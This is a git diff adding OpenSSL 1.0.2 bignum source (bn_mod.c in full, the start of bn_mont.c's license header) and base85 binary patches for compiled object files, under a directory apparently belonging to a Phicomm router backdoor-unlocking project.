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
ND=*uRxo`LQ{{=Z_%X|O;

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/bn_mod.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/bn_mod.c
new file mode 100644
index 0000000..ffbce89
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/bn_mod.c
@@ -0,0 +1,316 @@
+/* crypto/bn/bn_mod.c */
+/*
+ * Includes code written by Lenka Fibikova <fibikova@exp-math.uni-essen.de>
+ * for the OpenSSL project.
+ */
+/* ====================================================================
+ * Copyright (c) 1998-2000 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.openssl.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    openssl-core@openssl.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.openssl.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include "cryptlib.h"
+#include "bn_lcl.h"
+
+#if 0                           /* now just a #define */
+int BN_mod(BIGNUM *rem, const BIGNUM *m, const BIGNUM *d, BN_CTX *ctx)
+{
+    return (BN_div(NULL, rem, m, d, ctx));
+    /* note that  rem->neg == m->neg  (unless the remainder is zero) */
+}
+#endif
+
+int BN_nnmod(BIGNUM *r, const BIGNUM *m, const BIGNUM *d, BN_CTX *ctx)
+{
+    /*
+     * like BN_mod, but returns non-negative remainder (i.e., 0 <= r < |d|
+     * always holds)
+     */
+
+    if (!(BN_mod(r, m, d, ctx)))
+        return 0;
+    if (!r->neg)
+        return 1;
+    /* now   -|d| < r < 0,  so we have to set  r := r + |d| */
+    return (d->neg ? BN_sub : BN_add) (r, r, d);
+}
+
+int BN_mod_add(BIGNUM *r, const BIGNUM *a, const BIGNUM *b, const BIGNUM *m,
+               BN_CTX *ctx)
+{
+    if (!BN_add(r, a, b))
+        return 0;
+    return BN_nnmod(r, r, m, ctx);
+}
+
+/*
+ * BN_mod_add variant that may be used if both a and b are non-negative and
+ * less than m
+ */
+int BN_mod_add_quick(BIGNUM *r, const BIGNUM *a, const BIGNUM *b,
+                     const BIGNUM *m)
+{
+    if (!BN_uadd(r, a, b))
+        return 0;
+    if (BN_ucmp(r, m) >= 0)
+        return BN_usub(r, r, m);
+    return 1;
+}
+
+int BN_mod_sub(BIGNUM *r, const BIGNUM *a, const BIGNUM *b, const BIGNUM *m,
+               BN_CTX *ctx)
+{
+    if (!BN_sub(r, a, b))
+        return 0;
+    return BN_nnmod(r, r, m, ctx);
+}
+
+/*
+ * BN_mod_sub variant that may be used if both a and b are non-negative and
+ * less than m
+ */
+int BN_mod_sub_quick(BIGNUM *r, const BIGNUM *a, const BIGNUM *b,
+                     const BIGNUM *m)
+{
+    if (!BN_sub(r, a, b))
+        return 0;
+    if (r->neg)
+        return BN_add(r, r, m);
+    return 1;
+}
+
+/* slow but works */
+int BN_mod_mul(BIGNUM *r, const BIGNUM *a, const BIGNUM *b, const BIGNUM *m,
+               BN_CTX *ctx)
+{
+    BIGNUM *t;
+    int ret = 0;
+
+    bn_check_top(a);
+    bn_check_top(b);
+    bn_check_top(m);
+
+    BN_CTX_start(ctx);
+    if ((t = BN_CTX_get(ctx)) == NULL)
+        goto err;
+    if (a == b) {
+        if (!BN_sqr(t, a, ctx))
+            goto err;
+    } else {
+        if (!BN_mul(t, a, b, ctx))
+            goto err;
+    }
+    if (!BN_nnmod(r, t, m, ctx))
+        goto err;
+    bn_check_top(r);
+    ret = 1;
+ err:
+    BN_CTX_end(ctx);
+    return (ret);
+}
+
+int BN_mod_sqr(BIGNUM *r, const BIGNUM *a, const BIGNUM *m, BN_CTX *ctx)
+{
+    if (!BN_sqr(r, a, ctx))
+        return 0;
+    /* r->neg == 0,  thus we don't need BN_nnmod */
+    return BN_mod(r, r, m, ctx);
+}
+
+int BN_mod_lshift1(BIGNUM *r, const BIGNUM *a, const BIGNUM *m, BN_CTX *ctx)
+{
+    if (!BN_lshift1(r, a))
+        return 0;
+    bn_check_top(r);
+    return BN_nnmod(r, r, m, ctx);
+}
+
+/*
+ * BN_mod_lshift1 variant that may be used if a is non-negative and less than
+ * m
+ */
+int BN_mod_lshift1_quick(BIGNUM *r, const BIGNUM *a, const BIGNUM *m)
+{
+    if (!BN_lshift1(r, a))
+        return 0;
+    bn_check_top(r);
+    if (BN_cmp(r, m) >= 0)
+        return BN_sub(r, r, m);
+    return 1;
+}
+
+int BN_mod_lshift(BIGNUM *r, const BIGNUM *a, int n, const BIGNUM *m,
+                  BN_CTX *ctx)
+{
+    BIGNUM *abs_m = NULL;
+    int ret;
+
+    if (!BN_nnmod(r, a, m, ctx))
+        return 0;
+
+    if (m->neg) {
+        abs_m = BN_dup(m);
+        if (abs_m == NULL)
+            return 0;
+        abs_m->neg = 0;
+    }
+
+    ret = BN_mod_lshift_quick(r, r, n, (abs_m ? abs_m : m));
+    bn_check_top(r);
+
+    if (abs_m)
+        BN_free(abs_m);
+    return ret;
+}
+
+/*
+ * BN_mod_lshift variant that may be used if a is non-negative and less than
+ * m
+ */
+int BN_mod_lshift_quick(BIGNUM *r, const BIGNUM *a, int n, const BIGNUM *m)
+{
+    if (r != a) {
+        if (BN_copy(r, a) == NULL)
+            return 0;
+    }
+
+    while (n > 0) {
+        int max_shift;
+
+        /* 0 < r < m */
+        max_shift = BN_num_bits(m) - BN_num_bits(r);
+        /* max_shift >= 0 */
+
+        if (max_shift < 0) {
+            BNerr(BN_F_BN_MOD_LSHIFT_QUICK, BN_R_INPUT_NOT_REDUCED);
+            return 0;
+        }
+
+        if (max_shift > n)
+            max_shift = n;
+
+        if (max_shift) {
+            if (!BN_lshift(r, r, max_shift))
+                return 0;
+            n -= max_shift;
+        } else {
+            if (!BN_lshift1(r, r))
+                return 0;
+            --n;
+        }
+
+        /* BN_num_bits(r) <= BN_num_bits(m) */
+
+        if (BN_cmp(r, m) >= 0) {
+            if (!BN_sub(r, r, m))
+                return 0;
+        }
+    }
+    bn_check_top(r);
+
+    return 1;
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/bn_mod.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/bn_mod.o
new file mode 100644
index 0000000000000000000000000000000000000000..51fb779bf30b47783d181e0af2dcb1b3599dacd2
GIT binary patch
literal 5120
zcmb`JZEO@p7=X9E7D`*TM{V$wuR~90Q7(6Y!SaK2uf28;7pQPWLCV>q2d%W%a<>bu
z0Wp>m#{%JxM*m?j#Ge>rLX449TTy~0Mnn>$f@ze}@*)246VCUYow=La-X<tcvNto&
zykGOaGrPAhs5KTA6iB=kNGql6j8jQUIkV$BI;@kXOXbq96?6Yo!Xa|5MJ2bC<`DT*
zC10xKrb=%6)0a_jFr_aU*z1(^h04Glk5e+HsYAuMFg}$HHfrQYm0VNF^;Ttb`r=9S
zzX^sPQ{yeG$q0Hls}4-KRI<lY!p+W7hhU}-47)Tk1~!z<N-Ovs>qw{5Nc|}!rWG_`
zhRC%SY2+txNv8@)QLn+lR9|IIIAa*;-30UP?fk*OZk##0nNN2^!x-2H>6!ssaMH}&
zRyNZx5b&&Q2$3(8mJqq6k<&`JMI$3-dUQw#sq)ZW@!hFIRUUN+R|Zo?anL_HzA{9H
z)!OsMbd_9D$!RJ*UZ#>UK7pcrL-PZ9y{WM*f#zUJsd!~LV;GX$KrTY5lvZU+Cei0q
zat3p4Mx<p6Hd`BN;03!xU0?I3L7VRmD#ptWy45NPd!XW)CpS^7>_f<hP-0*hL~oDn
zyp>M-Q#i{;@_&>(L_Sx-3Y_ruD)~!kR%?ILOU?X3mL3ZZj#eCg84d~0l1hFcBXqrH
zq<>D(pYnh9UL4jx*bP6Y9PmRI{i*TIO6`PFv1VfMsy-9z@I9!~HL!b8shJqB%w=bl
z^jQt>376`7QM2fc?SQjyUZAIGS<F;yP{?_uh2A2Kd<drn?i(!+b7vGmIIGS3sn6EP
z&y?dKflx+I*U`%#A|vCDp#Q2yE;Zl<#|um4R>KD1q+TZto^lGH%H>c87e5$MQ+@pk
zcXdnDi0g*C*1Oc}TkKzM(5e6VB|fijS&fOMBFGPV!#70Jnii=LUOmV#Z`i8LPAYhA
zom9~0ESOb3wd4rAFnqvgv$a<28)fIg!UoxOz!8+)yGmu(D%ly3O9Ew$vP+>us?*GL
z8kx?a!l3Lr=xCCCPlAq01=TXJ(~#BK&vcrYPS#H}<0n|A<oG%HFa3BxeuC-LXZ$qD
zZgAmL<&q%8g!@?rYgO!p{W_C7jC(lbP-XYQB1Nt~P~0Tf6(;5C2H72uT>+|x`O=u4
zD%gj7vAt_l4*j_5&AnrOUtl@`)KO*Mj#9Zqg`Aea6m1@5>vx(PjQ<?d8HO>|jnx3c
zJ%I5K6bEHr;ahUGBD*1}X8fpE4u=C9tq16_eFt#gO}Ot>u<tEYFSBn`WAZPCP$d15
zp1gu*j|FI1bYxCt?t+7!;#`I^hcsm}q<pFk$E;3n4thIsc_~aQg*fRQ0Co>N&RkJC
ztFhr&!+i3~ZTL#y=$HGW_Xt>s@ng_qqvrwoP4MKiAGP7n+VBK$^m_$*Y~1f&7$f(w
zlF_>Z>@ed=#_3%FhJC(xj@$6JZ8+ZVe0EOR@H4<MPJV{z9R&6@<6(BT={*BB3Qs=!
z*O~mQOrGbt2=<vzz6?0}{f^1gI|nxA*~l-n;Y)3}V#6N?j(*=@FLHWk!S6;J`Dbjn
z6pcr^d)mEQrNEj<JPt!C(xj~oC|YD~W8?Z@I1*L@S}=mk?VY=@Yin=EE@?!u0}W2t
zFtXF=+`0qT3?^!9?e3*>K__>Z)j=cOMi+|Lho6ch^|pl0C);CmnB18_B1pyJG$hpJ
zi!kg;c64sj{U|F8QHV{mURi+IHDRfzw;xT!jqXUaQ%_34b?YL%h8~F}5<N5!(;5va
zV;g7f2Ho|xL@XxFh1y^%f~O3gzu|ucHhd3YTLe!zJe=3T7#s5G@NjM*gobuR`FAKa
zIi6E4|B=9F2)q!^12(iH+ON0auL*o6=y3Z-1%9u<KM}Y~;9m*+K7n5r_%wn4A@KVJ
zzJT2~j9;|hCGa_d{BaxpuE6IB^1lmwzQAR6-_Y*^0(aT)M+N?%ApeBGJpzvjT#SFW
zz{NO;z{NVI1TN<Dg1{FDe)%UB_vIG&3<S`yTL=%Y`z3_XkXORPd52Ih@q9K4`4rFp
zIf0AuyTK+lTxKG49;Uxp&cBl{S@<zFf8WCS_w9y-^Y5FB#n1in?_0Bl^Y6@l3+LaN
zH!YlhPcB$E|86+hCb?h!UYESd{%*Z33ca2%`wl)z#JbwNdaO^EyzOmzo8*lqlahC9
zPj`1L4lLfI$Gq^Le=)p6;eBk*x5o`{Z=$C+meBhpFSQWsh-^!=b;npn?yhr#I&N`_
z#Y`QWKg7-xUuNmxQ)w2AP^2zH%z+CJ6Eq(?zojrnUH*>_-vQY0Oe1Gvh-iyh{Bmyf
z{|GFg&Ht+J2VJ!3gGX%K|HC4LG562=6#^4QkKAGWt3V0={j%efF~RlS8Db82{y2`p
z0AsQ0pJ4v$EDKhBypQ?nr&gFAO4vrReyGd!dHwSFM$H@SK=Jn)zC-Z6X4OY#tsNlg
g1UiJq-%sW&n}0sXZ)86GX7=Z=iwm-z*Nx+U0R7ALD*ylh

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/bn_mont.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/bn_mont.c
new file mode 100644
index 0000000..aadd5db
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/bn_mont.c
@@ -0,0 +1,555 @@
+/* crypto/bn/bn_mont.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
